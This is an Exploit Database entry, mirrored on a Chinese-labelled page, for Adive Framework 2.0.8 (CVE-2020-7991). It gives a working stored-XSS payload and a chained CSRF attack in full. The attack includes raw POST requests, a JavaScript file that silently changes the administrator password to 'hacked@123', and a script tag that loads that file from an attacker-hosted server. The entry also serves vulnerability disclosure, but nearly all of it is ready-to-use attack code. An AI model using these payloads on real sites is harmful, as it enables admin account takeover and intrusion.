Adive Framework 2.0.8 – Cross-Site Request Forgery (Change Admin Password)

• Exploit Database
• 126 阅读

• 作者： Sarthak Saini
  日期： 2020-01-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47966/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94

  # Exploit Title:Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password) # Exploit Author: Sarthak Saini # Date: 2020-01-18 # Vendor Link : https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.8 # CVE:CVE-2020-7991 # Category: Webapps # Tested on: windows64bit / mozila firefox # # |--!>   |----------------------------------------------------------------------------------   1) Persistent Cross-site Scripting at user add page   Description : The parameter &apos;userUsername=&apos; is vulnerable to Stored Cross-site scripting Payload:- <script>alert(1)</script>   POST /admin/user/add HTTP/1.1 Host: 192.168.2.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://192.168.2.5 DNT: 1 Connection: close Referer: http://192.168.2.5/admin/user/add Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 Upgrade-Insecure-Requests: 1   userName=test&userUsername=<script>alert(&apos;xss&apos;)</script>&pass=test&cpass=test&permission=3     |----------------------------------------------------------------------------------     2) account takeover - cross side request forgery (Change Admin Password)     Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.   -> Save the payload as exp.js   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- function execute() { var nuri ="http://192.168.2.5/admin/config"; xhttp = new XMLHttpRequest(); xhttp.open("POST", nuri, true); xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhttp.withCredentials = "true"; var body = ""; body += "\r\n\r\n"; body += "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web"; xhttp.send(body); return true; }   execute(); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-   -> Start a server and host the exp.js. Send the exp.js file in the xss payload   Payload:- <script src="http://192.168.2.5/exp.js"></script>   POST /admin/user/add HTTP/1.1 Host: 192.168.2.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 143 Origin: http://192.168.2.5 DNT: 1 Connection: close Referer: http://192.168.2.5/admin/user/add Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 Upgrade-Insecure-Requests: 1   userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3     -> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123   |-----------------------------------------EOF-----------------------------------------